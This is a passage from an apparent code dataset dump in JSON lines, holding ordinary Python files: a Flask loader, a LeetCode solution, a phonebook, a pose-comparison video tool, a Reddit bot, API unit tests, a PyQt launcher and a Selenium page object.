","sub_path":"utils/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308744976","text":"app = None\n\n\ndef start_app():\n from backend.initial_setup import CalculatedServer\n global app\n server = CalculatedServer()\n app = server.app\n return server\n\n\ndef start_server():\n server = start_app()\n server.app.run(host='0.0.0.0', port=8000)\n\n\nif __name__ == '__main__':\n start_server()\nelse:\n start_app()\n","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"645436041","text":"class Solution:\n def reverse(self, x: int) -> int:\n reversed_num = \"\"\n start = 0\n end = len(str(x))\n while str(x).endswith(\"0\") and x != 0:\n x //= 10\n\n if x < 0:\n sign = \"-\"\n x = abs(x)\n else:\n sign = \"\"\n\n for i in reversed(str(x)[start:end]):\n reversed_num += i\n x = int(sign + reversed_num)\n\n neg_limit= -0x80000000\n pos_limit= 0x7fffffff\n if not(neg_limit < x < pos_limit):\n x = 0\n return x\n\n","sub_path":"easy/reverseInteger.py","file_name":"reverseInteger.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227461867","text":"liste={}\n\nkayit=\"\"\nwhile True:\n #---------------SECME INPUTU-----------------------------\n print(\"\\n________________REHBERIM MENU_____________________\\n\")\n secim=input(\"\"\"\nYeni Kayit : K\nKisiler : R CIKIS=Q\n---------> :\"\"\").upper()\n\n if secim=='Q':\n print('Cikiliyor.....')\n 
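# 'Q' was chosen: leave the main menu loop and end the program\n 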
break\n elif secim=='K':\n\n yeni_kisi = input(' Adi ve Soyadi :' ).upper()\n\n while True:\n\n telefon=input(' Telefon No :')\n\n if len(telefon)!=10 :\n print('lutfen 10 haneli telefonunuzu giriniz')\n continue\n else:\n tel = f'+31 {telefon[0 :3]} {telefon[3 :6]} {telefon[6 :8]} {telefon[8 :10]}'\n break\n\n #------------SOZLUGE EKLEME-----------------------\n\n liste[yeni_kisi]=tel\n print('\\nBasariyla kaydedildi...\\n')\n\n #------------DOSYAYA YAZMA----------------------------------\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku,yaz in liste.items():\n\n kayit=f'{oku} : {yaz} ''\\n'\n\n rehber.write(kayit)\n\n #----------------REHBERE GIRIS INPUTU----------------------------\n elif secim== 'R' :\n\n while True:\n if liste == {} :\n print ( 'Rehberinizde kayit yok.' )\n break\n else :\n #---------REHBERI GOSTERME-------------------\n for anahtar, deger in liste.items () :\n\n print ( \">>>{} : {}\".format ( anahtar , deger ) )\n\n #----------REHBER ICINDEKI SECIMLER------------------------\n\n duzen = input ( \"\"\"\n>>>>>>>>>>>>>>>>>>>>>\n\n Kayit Sil : S\n Kayit Yenile : Y\n Tumunu sil : T\n Ana menu : X\n >>>>>>>>>>>>>>>>>>>> :\"\"\" ).upper()\n #------------ANA MENUYE DONUS----------------------\n if duzen=='X':\n print('Ana Menuye donuluyor... ')\n break\n\n #---------REHBERDEN ISIM SILME----------------------\n elif duzen=='S':\n for anahtar ,deger in liste.items () :\n print ( \"{} : {}\".format ( anahtar , deger ) )\n\n while True:\n\n sil=input('\\n''silmek istediginiz ismi giriniz(cikis ENTER) :').upper()\n if sil=='':\n\n break\n elif sil in liste:\n liste.pop(sil) #POP() KOMUTU ILE SILINDI\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku , yaz in liste.items () :\n kayit = f'{oku} : {yaz} ''\\n'\n\n rehber.write ( kayit )\n print ( 'Kayit silindi simdi Ana menuye yonlendiriliyorsunuz....' 
'\\n')\n\n break\n else:\n print('kayit bulunamadi')\n continue\n\n #----------REHBERDE ISIM NO GUNCELLEME-----------------\n\n elif duzen=='Y' :\n for anahtar,deger in liste.items () :\n print ( \"{} : {}\".format ( anahtar , deger ) )\n\n\n while True :\n guncelle = input ( '\\n''lutfen guncellemek istediginiz ismi giriniz(cikis ENTER)' ).upper()\n if guncelle=='':\n break\n\n elif guncelle not in liste:\n print('kayit bulunamadi' )\n continue\n else:\n liste.pop ( guncelle )\n break\n yeni_giris = input ('\\n''Yeni ismi Giriniz:' ).upper()\n while True:\n\n yeni_giris2 = input ( 'Yeni Tel No:' )\n\n if len ( yeni_giris2 ) != 10 :\n print ( 'lutfen 10 haneli telefonunuzu giriniz' )\n continue\n else :\n tel = f'+31 {yeni_giris2[0 :3]} {yeni_giris2[3 :6]} {yeni_giris2[6 :8]} {yeni_giris2[8 :10]}'\n\n break\n #-------------UPDATE KOMUTU ILE GUNCENLENDI-----------\n up_dte={yeni_giris:yeni_giris2}\n liste.update(up_dte)\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n\n for oku , yaz in liste.items () :\n kayit = f'{oku} : {yaz} ''\\n'\n print ( kayit )\n rehber.write ( kayit )\n\n print('isleminiz basariyla gerceklestirildi.')\n\n # ----------REHBERIN HEPSINI SILME-----------------\n elif duzen=='T' :\n liste.clear() #CLEAR() KOMUTU ILE TEMIZLENDI\n print('tum liste temizlendi')\n with open ( \"rehber.txt\" , \"w\" ) as rehber :\n rehber.write('')\n\n else:\n print('Lutfen dogru tusa bastiginizdan emin olun')\n continue\n\n break\n else:\n print('Yanlis bir tusa bastiniz')\n","sub_path":"rehber.py","file_name":"rehber.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"463810967","text":"import cv2\nimport numpy as np\nimport os\nimport moviepy.editor as mpe\nimport ffmpy\nfrom modules.inference_engine_pytorch import InferenceEnginePyTorch\nfrom modules.parse_poses import parse_poses\nfrom modules.draw import draw_poses\n\n\ndef load_model(model='human-pose-estimation-3d.pth', device='CPU'):\n return InferenceEnginePyTorch(model, device)\n\n\ndef find_central(poses, prev_pose=None):\n pose = poses[:, 0:57]\n pose = pose.reshape((len(pose), -1, 3))\n posex = pose[:, :, 0]\n posey = pose[:, :, 1]\n avgsx = np.average(posex, axis=1)\n avgsy = np.average(posey, axis=1)\n avgx = np.average(avgsx)\n avgy = np.average(avgsy)\n errs = (avgsx - np.repeat(avgx, len(pose), axis=0)) ** 2 + (avgsy - np.repeat(avgy, len(pose), axis=0)) ** 2\n if prev_pose is not None:\n errs += 80 * np.average((poses - np.repeat(prev_pose, len(poses), axis=0) ** 2), axis=1)\n res, min_err = -1, np.inf\n for i in range(len(errs)):\n if errs[i] < min_err:\n res, min_err = i, errs[i]\n return np.expand_dims(poses[res], axis=0)\n\n\ndef find_humans(frame, net, prev_pose=None):\n stride = 8\n base_height = 256\n input_scale = base_height / frame.shape[0]\n scaled_img = cv2.resize(frame, dsize=None, fx=input_scale, fy=input_scale)\n scaled_img = scaled_img[:, 0:scaled_img.shape[1] - (scaled_img.shape[1] % stride)]\n\n inference_result = net.infer(scaled_img)\n fx = np.float32(0.8 * frame.shape[1])\n poses_3d, poses_2d = parse_poses(inference_result, input_scale, stride, fx, True)\n return find_central(poses_2d.copy(), prev_pose)\n\n\ndef draw_humans(frame, poses_2d):\n draw_poses(frame, poses_2d)\n\n\ndef open_video(path):\n cap = cv2.VideoCapture(path)\n if not cap.isOpened():\n raise Exception('Error opening video {}'.format(path))\n return cap\n\n\ndef concat_images(img1, img2, height=500):\n def compress_img(img):\n w = 
round(img.shape[1] * height / img.shape[0])\n return cv2.resize(img, (w, height), interpolation=cv2.INTER_AREA)\n\n c1 = compress_img(img1)\n c2 = compress_img(img2)\n return np.concatenate((c1, c2), axis=1)\n\n\ndef normalize_pose(p):\n p = p.astype('float64')\n p -= np.repeat(np.expand_dims(p.mean(axis=0), axis=0), p.shape[0], axis=0)\n k = np.median(p[:, 0] ** 2 + p[:, 1] ** 2)\n if k != 0:\n p /= k\n return p\n\n\ndef pose_to_points_array(pose):\n pose = pose.copy()\n return pose[0, :-1].reshape((-1, 3))[:, 0:2]\n\n\ndef count_pos_error(pos1, pos2):\n p1 = normalize_pose(pose_to_points_array(pos1))\n p2 = normalize_pose(pose_to_points_array(pos2))\n return round(((p1 - p2) ** 2).sum(axis=1).mean().item() * 1000000)\n\n\ndef add_error_on_frame(frame, err):\n font = cv2.FONT_HERSHEY_PLAIN\n font_scale = 1.0\n thickness = 2\n h, w = frame.shape[: 2]\n\n def get_text_start_point(center_point, text):\n center_point_x, center_point_y = center_point\n text_sz, _ = cv2.getTextSize(text, font, font_scale, thickness)\n text_sz_x, text_sz_y = text_sz\n return (center_point_x - text_sz_x // 2,\n center_point_y + text_sz_y // 2)\n\n label = str(err)\n x, y = w // 2, h - 30\n cv2.rectangle(frame, (x - 50, y - 20), (x + 50, y + 20), color=[255, 255, 255], thickness=-1)\n cv2.putText(frame, label, get_text_start_point((x, y), label),\n font, thickness=thickness, color=[0, 0, 0], fontScale=font_scale)\n\n return frame\n\n\ndef print_grade(total_err):\n print()\n print('Total err: {}'.format(total_err))\n\n grades = [(75, 5), (150, 4), (225, 3), (300, 2), (np.inf, 1)]\n\n for bound, grade in grades:\n if total_err <= bound:\n print('Grade: {}'.format(grade))\n return total_err, grade\n\n\ndef modify_two_videos(cap1, cap2, frame_modifier, out=None, logger=None):\n fps = round(cap1.get(cv2.CAP_PROP_FPS))\n cap1.set(cv2.CAP_PROP_FPS, fps)\n cap2.set(cv2.CAP_PROP_FPS, fps)\n frames = round(min(\n cap1.get(cv2.CAP_PROP_FRAME_COUNT),\n cap2.get(cv2.CAP_PROP_FRAME_COUNT)))\n\n i = 0\n while cap1.isOpened() and cap2.isOpened():\n print('\\rFrame {}/{}'.format(i, frames), end='')\n if logger is not None:\n logger.log(i, frames)\n i += 1\n ret1, frame1 = cap1.read()\n ret2, frame2 = cap2.read()\n if not ret1 or not ret2:\n break\n frame = frame_modifier(frame1, frame2)\n\n if out is not None:\n out.write(frame)\n\n cap1.release()\n cap2.release()\n if out is not None:\n out.release()\n\n\ndef smooth_poses(prv, cur, nxt):\n e1 = count_pos_error(prv, cur)\n e2 = count_pos_error(cur, nxt)\n e3 = count_pos_error(prv, nxt)\n res = cur\n if e1 + e2 > 1.5 * e3:\n res = (prv + nxt) // 2\n return res\n\n\nclass Logger:\n def __init__(self, callback, l_threshold, r_threshold):\n self.callback = callback\n self.l_threshold = l_threshold\n self.r_threshold = r_threshold\n\n def log(self, x, y):\n \"\"\"x out of y done\"\"\"\n if self.callback is not None:\n self.callback((self.l_threshold * (y - x) + self.r_threshold * x) / y)\n\n\ndef draw_arrows(frame, train_pose, my_pose):\n train_normalized = normalize_pose(train_pose.copy())\n my_normalized = normalize_pose(my_pose.copy())\n train_pose = pose_to_points_array(train_pose)\n my_pose = pose_to_points_array(my_pose)\n train_center = train_pose.mean(axis=0)\n my_center = my_pose.mean(axis=0)\n for i in range(my_normalized.shape[0]):\n d = my_normalized[i] - train_normalized[i]\n dist = (d[0] ** 2).sum()\n if dist > 0.0005:\n x = tuple(np.rint(my_pose[i]).astype(int))\n y = tuple(np.rint(train_pose[i] - train_center + my_center).astype(int))\n frame = cv2.arrowedLine(frame, x, 
y,\n color=[0, 255, 0], thickness=3)\n return frame\n\n\ndef make_video(path1, path2, out_path, res_estimator, processing_log=None):\n prv1, cur1 = None, None\n prv2, cur2 = None, None\n prv_frame1, prv_frame2 = None, None\n\n cap1 = open_video(path1)\n cap2 = open_video(path2)\n fps = round(cap1.get(cv2.CAP_PROP_FPS))\n\n errors = []\n h1, w1 = round(cap1.get(cv2.CAP_PROP_FRAME_HEIGHT)), round(cap1.get(cv2.CAP_PROP_FRAME_WIDTH))\n h2, w2 = round(cap2.get(cv2.CAP_PROP_FRAME_HEIGHT)), round(cap2.get(cv2.CAP_PROP_FRAME_WIDTH))\n h, w = concat_images(np.zeros((h1, w1, 3)), np.zeros((h2, w2, 3))).shape[: 2]\n\n def frame_modifier(frame1, frame2):\n nonlocal prv1, prv2, cur1, cur2, prv_frame1, prv_frame2, h, w\n nxt1 = find_humans(frame1, res_estimator, cur1)\n nxt2 = find_humans(frame2, res_estimator, cur2)\n if prv1 is None:\n prv1, prv2 = nxt1, nxt2\n elif cur1 is None:\n cur1, cur2 = nxt1, nxt2\n else:\n cur1 = smooth_poses(prv1, cur1, nxt1)\n cur2 = smooth_poses(prv2, cur2, nxt2)\n if prv_frame1 is not None:\n draw_humans(prv_frame1, cur1)\n draw_humans(prv_frame2, cur2)\n frame2 = draw_arrows(frame2, cur1.copy(), cur2.copy())\n frame = concat_images(prv_frame1, prv_frame2)\n else:\n frame = concat_images(frame1, frame2)\n\n prv_frame1, prv_frame2 = frame1, frame2\n prv1, prv2, cur1, cur2 = cur1, cur2, nxt1, nxt2\n\n err = 0\n if cur1 is not None:\n err = count_pos_error(cur1, cur2)\n errors.append(err)\n\n return add_error_on_frame(frame, err)\n\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n c = out_path.split('.')\n tmp_path = '.'.join(c[:-1]) + '_tmp.' + c[-1]\n out_cap = cv2.VideoWriter(tmp_path, fourcc, fps, (w, h))\n\n modify_two_videos(cap1, cap2, frame_modifier, out_cap, Logger(processing_log, 0, 100))\n\n # set audio\n output_video = mpe.VideoFileClip(tmp_path)\n audio_background = mpe.VideoFileClip(path1).audio.subclip(t_end=output_video.duration)\n final_video = output_video.set_audio(audio_background)\n final_video.write_videofile(out_path)\n os.remove(tmp_path)\n\n if len(errors) != 0:\n total = round(np.mean(errors).item())\n return print_grade(total)\n\n\ndef convert_video(video_path, out_path):\n flags = '-r 24 -codec copy'\n ff = ffmpy.FFmpeg(inputs={video_path: None}, outputs={out_path: flags})\n ff.run()\n\n\nif __name__ == '__main__':\n path1 = '../../kek1.mp4'\n path2 = '../../kek2.mp4'\n out_path = '../../kek5.mp4'\n\n e = load_model()\n\n make_video(path1, path2, out_path, e)","sub_path":"process_videos.py","file_name":"process_videos.py","file_ext":"py","file_size_in_byte":8520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461347022","text":"import praw\nimport time\nimport logging\nfrom pymongo import MongoClient\n\n# Base class for all bots\nclass Bot:\n\n DEBUG = False\n\n # praw constants\n GET_LIMIT = 50\n LOOP_WAIT_TIME = 10\n\n # word parsing constants\n WHOLE_WORD_TOLERANCE = 3\n\n def __init__(self, bot_name, bot_agent, subreddit_name, map_or_list):\n \"\"\"\n Constructs a reddit bot that crawls the comments to tally for keywords.\n\n :param bot_name:\n :param bot_agent:\n :param subreddit_name:\n :param map_or_list: A list of keywords to watch for or a dict with key as the\n keywords with value as some meta data.\n :return:\n \"\"\"\n\n data_type = type(map_or_list)\n assert data_type is dict or data_type is list\n\n # logging setup\n logging.basicConfig(filename=subreddit_name + '.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s:%(message)s')\n logging.info(\"Bot 
initializing\")\n\n # Bot info\n self.bot_name = bot_name\n self.bot_agent = bot_agent\n self.subreddit_name = subreddit_name\n self.start_time = int(time.time())\n self.last_insert_time = self.start_time\n\n # Reddit objects\n self.reddit = praw.Reddit(user_agent=self.bot_agent)\n self.reddit.config.store_json_result = True\n self.subreddit = self.reddit.get_subreddit(self.subreddit_name)\n\n # Database objects (remember to close database)\n self.mongo_client = MongoClient()\n self.db = self.mongo_client[bot_name]\n self.comments = self.db.comments\n self.meta = self.db.meta\n self.tags = self.db.tags\n\n # Can either supply tags as a list of strings\n # or a dict with key being the tag name and properties\n # being the meta information\n if data_type is dict:\n tag_names = list(map_or_list.keys())\n else:\n tag_names = map_or_list\n\n for name in tag_names:\n assert name.islower()\n\n # update the meta data of database\n if not self.meta.find_one():\n inserted = self.meta.insert_one({\n '_id': 'meta',\n 'bot_name': self.bot_name,\n 'bot_agent': self.bot_agent,\n 'subreddit_name': self.subreddit_name,\n 'tag_names': tag_names\n })\n\n if self.DEBUG:\n print('inserted meta', inserted)\n\n # insert new tags or update old ones\n for tag_name in tag_names:\n if data_type is dict:\n meta = map_or_list[tag_name]\n else:\n meta = {}\n\n doc = self.tags.find_one({'name': tag_name})\n\n if doc:\n doc['meta'] = meta\n if self.DEBUG:\n print('updated tag meta', tag_name, meta)\n else:\n inserted = self.tags.insert_one({\n 'name': tag_name,\n 'words': tag_name.split(),\n 'meta': meta,\n 'count': 0,\n 'popularity': 0\n })\n if self.DEBUG:\n print('inserted tag', inserted)\n\n logging.info(\"Successfully initialized bot\")\n\n def process_comment(self, comment):\n \"\"\"\n Process comment body and add it to database.\n\n Ignored if comment already in database.\n\n :param comment:\n :return:\n \"\"\"\n\n if self.DEBUG:\n print('received comment', comment)\n\n doc = self.comments.find_one({'_id': comment.id})\n\n # if no entry with given comment id in the processed table\n if not doc:\n hits = self.process_string(comment.body)\n j = comment.json_dict\n j['_id'] = j['id']\n j['hits'] = hits\n self.comments.insert_one(j)\n\n def process_string(self, s):\n \"\"\"\n Check for any term mentioned in a string and increment the counter in the database.\n\n Case insensitive search. 
Only increment a term once per comment so no \"chuga chuga chuga....\" spams\n\n :param s:\n :return: a list of all the id that had a hit in this string\n \"\"\"\n\n comment_words = s.lower().split()\n hits = []\n for tag in self.tags.find():\n tag_words = tag['words']\n\n match = self.search_words_in_list(tag_words, comment_words)\n if match:\n self.tags.update_one({'_id': tag['_id']}, {'$inc': {'count': 1}})\n\n # if self.DEBUG:\n print('matched', tag['name'], 'count', tag['count'])\n\n hits.append(tag['_id'])\n return hits\n\n @classmethod\n def search_words_in_list(cls, search_words, words_list):\n \"\"\"\n Inexact search to find search_words in words_list.\n\n :param search_words:\n :param words_list:\n :return: whether there is a match\n \"\"\"\n\n search_len = len(search_words)\n list_len = len(words_list)\n match = False\n # match whole words if length of the search_words is less than WHOLE_WORD_TOLERANCE\n if search_len < cls.WHOLE_WORD_TOLERANCE:\n for x in range(0, list_len - search_len + 1):\n if search_words == words_list[x:x + search_len]:\n match = True\n break # efficiency\n # only have to match search_len - 1 part of the search_words\n else:\n for x in range(0, list_len - search_len):\n sub_word = words_list[x:x + search_len]\n matches = 0\n for name_part in search_words:\n if name_part in sub_word:\n matches += 1\n if matches >= search_len - 1:\n match = True\n break\n return match\n\n def start(self):\n \"\"\"\n Start the bot.\n\n Directly monitor and process all new comments made to the subreddit.\n\n :return:\n \"\"\"\n\n logging.info(\"Bot starting\")\n\n while True:\n comments = self.subreddit.get_comments(limit=self.GET_LIMIT)\n for comment in comments:\n self.process_comment(comment)\n time.sleep(self.LOOP_WAIT_TIME)\n","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"551412305","text":"#!/usr/bin/env python3\n\nfrom hicprediction.training import training\nfrom hicprediction.configurations import *\nimport json\n\n@alltrain_options\n@click.command()\ndef create(setdirectory,conversion, modeloutputdirectory):\n for path in tqdm(os.listdir(setdirectory),\\\n desc=\"Iterating all of the training sets in directory\"):\n training(modeloutputdirectory, conversion , setdirectory\\\n +\"/\" +path)\n\nif __name__ == '__main__':\n create()\n","sub_path":"hicprediction/scripts/trainAll.py","file_name":"trainAll.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52337195","text":"from unittest import TestCase\nimport json\nimport logging\n\nimport peewee\n\nimport app\nfrom app import components\n\nAPI_BASE = components.BASE_PATH\n\n\nclass TestNotes(TestCase):\n\n post_args = {\n \"content_type\": \"application/json\"\n }\n\n new_note = {\n \"title\": \"test_title\",\n \"content\": \"test_content\\r\\nárviz tűrő tükör fúró gép\\r\\n\",\n \"tags\": [\"these\", \"are\", \"the\", \"test\", \"tags\", \"we\", \"look\", \"for\", \"árviz\", \"tűrő\", \"tükör\", \"fúró\", \"gép\"]\n }\n\n edited_note = {\n \"title\": \"edited title\",\n \"content\": \"edited contents\",\n \"tags\": [\"these\", \"are\", \"the\", \"other\", \"tags\", \"we\", \"have\", \"edited\", \"so\", \"far\"]\n }\n\n def setUp(self):\n self._db = peewee.SqliteDatabase(\":memory:\")\n components.DB.initialize(self._db)\n components.DB.connect()\n 
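# create tables for all registered models so each test starts with a clean in-memory schema\n 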
components.DB.create_tables(app.MODELS, safe=True)\n self.app = app.APP.test_client()\n pass\n\n def tearDown(self):\n self._db.close()\n\n def test_create_note(self):\n # given\n # - fixture\n\n # when\n response = self.app.post(API_BASE + \"/notes/\", data=json.dumps(self.new_note), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(201, response.status_code)\n\n response_json = json.loads(response.data)\n\n self.assertTrue(\"id\" in response_json)\n self.assertTrue(\"title\" in response_json)\n self.assertTrue(\"content\" in response_json)\n self._validate_tags(self.new_note, response_json)\n\n response = self.app.get(API_BASE + \"/notes/\")\n self.assertEqual(200, response.status_code)\n response_json = json.loads(response.data)\n\n self.assertTrue(response_json)\n\n def test_read_note(self):\n # given\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n response_json = json.loads(response.data)\n\n self._validate_tags(self.new_note, response_json)\n # TODO validate content\n\n def test_delete_note(self):\n # given\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.delete(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n # then\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(404, response.status_code)\n\n def test_edit_note(self):\n # given\n # - fixture, and\n note_id = self._insert_note(self.new_note)\n\n # when\n response = self.app.put(\"{}/notes/{}/\".format(API_BASE, note_id), data=json.dumps(self.edited_note), **TestNotes.post_args)\n\n # then\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n\n response_json = json.loads(response.data)\n\n self._validate_tags(self.edited_note, response_json)\n\n # -- check ID due a previous fuckup\n response = self.app.get(\"{}/notes/{}/\".format(API_BASE, note_id), **TestNotes.post_args)\n self.assertIsNotNone(response)\n self.assertEqual(200, response.status_code)\n response_json = json.loads(response.data)\n\n self.assertEqual(note_id, response_json[\"id\"])\n\n def _insert_note(self, note):\n response = self.app.post(API_BASE + \"/notes/\", data=json.dumps(note), **TestNotes.post_args)\n\n self.assertIsNotNone(response)\n self.assertEqual(201, response.status_code)\n\n response_json = json.loads(response.data)\n note_id = response_json[\"id\"]\n self.assertIsNotNone(note_id)\n logging.debug(\"note_id={}\".format(note_id))\n return note_id\n\n def _validate_tags(self, expected, actual):\n self.assertEqual(len(expected[\"tags\"]), len(actual[\"tags\"]))\n for tag in expected[\"tags\"]:\n self.assertTrue(tag in actual[\"tags\"])\n","sub_path":"server/app/notes/tests/test_note_crud.py","file_name":"test_note_crud.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"602392797","text":"# -*- coding: utf-8 -*-\r\nimport ctypes # 需要用到的库\r\nimport sys\r\nfrom xiaoye_UI import Ui_MainWindow\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom craw import craw\r\n\r\n\r\nclass 
Ui_Main(QMainWindow, Ui_MainWindow):\r\n def __init__(self):\r\n super(Ui_Main, self).__init__(parent=None)\r\n self.setWindowIcon(QIcon('house.png'))\r\n self.setupUi(self)\r\n self.label.setPixmap(QPixmap('city.png'))\r\n self.pushButton.clicked.connect(self.onclick_button)\r\n self.pushButton_2.clicked.connect(self.onclick_button2)\r\n\r\n def onclick_button(self):\r\n name = self.lineEdit.text()\r\n if name == '合肥':\r\n craw(name='hf')\r\n else:\r\n craw()\r\n msg_box = QMessageBox(QMessageBox.Information, '提示', '房源爬取完成!')\r\n msg_box.exec_()\r\n\r\n def onclick_button2(self):\r\n name = self.lineEdit.text()\r\n if name == '合肥':\r\n QtGui.QDesktopServices.openUrl(QtCore.QUrl('http://localhost:63342/python_finalwork/index_hf.html?_ijt=jc6pvcdr3nudd977qfq3h1bmbt'))\r\n else:\r\n QtGui.QDesktopServices.openUrl(QtCore.QUrl('http://localhost:63342/python_finalwork/index.html?_ijt=scor7v2s64cdl1bprj7k7nf65u'))\r\n\r\n\r\nif __name__ == '__main__':\r\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(\"myappid\")\r\n app = QApplication(sys.argv)\r\n window = Ui_Main()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"XiaoYe.py","file_name":"XiaoYe.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603587104","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nimport time\nfrom .login_page import LoginPage\n\n# import re\n\n# class QuestionTypeSideBar:\n# # 顶部的收起来按钮,绝对路径,单个\n# _locator_collapse_btn = (By.XPATH,'//*[@id=\"querytype\"]/h3/em')\n# # 列表,绝对路径,列表\n# _locator_list = (By.XPATH, '//*[@id=\"querytype\"]/div/ul/li')\n# # 单个项的试题个数,相对路径,单个\n# _locator_item_number = (By.XPATH,'./div/span[2]')\n# # 题型名 相对路径\n# _locator_item_name = (By.XPATH,'./div/span[1]')\n# # 查看更多按钮\n# _locator_list_more_less = (By.XPATH,'//*[@id=\"querytype\"]/div/div/a')\n#\n# def click_more_less(self):\n# we = self.driver.find_element(*self._locator_list_more_less)\n# we.click()\n# time.sleep(2)\n# print(self.driver.find_element(*self._locator_list_more_less).text)\n# return we.text\n#\n# def get_more_less_text(self):\n# return self.driver.find_element(*self._locator_list_more_less).text\n#\n# def __init__(self, webdriver_: webdriver.Chrome):\n# self.driver = webdriver_\n#\n# # if webdriver_.current_url() != 'http://39.98.72.185:11001/qti/question/list':\n# # raise ValueError()\n#\n# self._is_collapsed = False\n# self._type_we_list = self.driver.find_elements(*self._locator_list)\n#\n# def click_collapse(self):\n# we = self.driver.find_element(*self._locator_collapse_btn)\n# we.click()\n# time.sleep(2) # 等待动画完毕\n# self._is_collapsed = not self._is_collapsed\n# return self._is_collapsed\n#\n# def is_collapsed(self):\n# return self._is_collapsed\n#\n# def click_item(self,type_name_):\n# '''\n# 点击列表项,条件是可见,且名字相同\n# :param type_name:问题名\n# :return: True表示 有该名字的项,且能点击\n# '''\n# if self.is_collapsed():\n# self.click_collapse()\n# type_list = self.get_list()\n# pos = [t['name'] for t in type_list].index(type_name_)\n#\n# if pos > 4 and self.get_more_less_text() == '查看更多':\n# self.click_more_less()\n#\n# we = self._type_we_list[pos]\n# we.click()\n#\n# def get_item_number(self,type_name):\n# '''\n# :param type_name: 题型名\n# :return: 返回值是数字的字符串形式,不应该用int()转整形,由test去转\n# '''\n# item_list = self.get_list()\n# for item in item_list:\n# if item['name'] == 
type_name:\n# return item['number']\n#\n# def get_list(self):\n# '''\n# 如果无数据,则返回[],必要条件是可见\n# :return: [{'name': '简单题', 'number': '12'}] number是字符串,这里只返回页面最真实的数据\n# '''\n# value = []\n# if self.get_more_less_text() == '查看更多':\n# self.click_more_less()\n#\n# we_list = self._type_we_list\n# for we in we_list:\n# name = we.find_element(*self._locator_item_name).text\n# number = we.find_element(*self._locator_item_number).text\n# print(u'name: {:10} number:{:4}'.format(name,number))\n# value.append({'name':name,'number':value})\n#\n# wes = self.driver.find_elements(By.XPATH,'//*[@id=\"diff\"]//*[@class=\"bank-right-li-item\"]')\n# print(str(len(wes)))\n# return value\n\nclass QuestionBankPage:\n\n # def __init__(self, driver_):\n # self.driver = driver\n # self.url = url\n # self.timeout = 20\n # login_page = LoginPage(self.driver)\n # login_page.login_success()\n # time.sleep(5)\n # self.driver.get(self.url)\n # time.sleep(2)\n # #self.side_bar_type = QuestionTypeSideBar(self.driver)\n # self.side_bar = SideBar(self.driver)\n\n # 定位符: 题型 难度 分类 标签\n _locator_side_bar_type_list = (By.XPATH, '//*[@id=\"querytype\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_level_list = (By.XPATH, '//*[@id=\"diff\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_category_list = (By.XPATH, '//*[@id=\"ban-class\"]//*[@class=\"bank-right-li-item\"]')\n _locator_side_bar_tag_list = (By.XPATH, '//*[@id=\"ban-title\"]//*[@class=\"bank-right-li-item\"]')\n\n def __init__(self, driver_: webdriver.Chrome):\n \"\"\"\n 初始化页面右侧的所有数据,包括项的名字和数量,以及对应项的webelement\n :param driver_:\n \"\"\"\n self._driver = driver_\n driver_.get('http://39.98.72.185:11001/qti/question/list')\n # 展开题型\n self.click_flexible()\n # webelement列表\n self._we_side_bar_type_list = driver_.find_elements(*self._locator_side_bar_type_list)\n self._we_side_bar_level_list = driver_.find_elements(*self._locator_side_bar_level_list)\n self._we_side_bar_category_list = driver_.find_elements(*self._locator_side_bar_category_list)\n self._we_side_bar_tag_list = driver_.find_elements(*self._locator_side_bar_tag_list)\n\n locator_name = (By.XPATH, './span[1]')\n locator_amount = (By.XPATH, './span[2]')\n\n # 题型列表{'type':选择题,'amount':12}\n self.side_bar_type_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_type_list]\n self.side_bar_level_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': 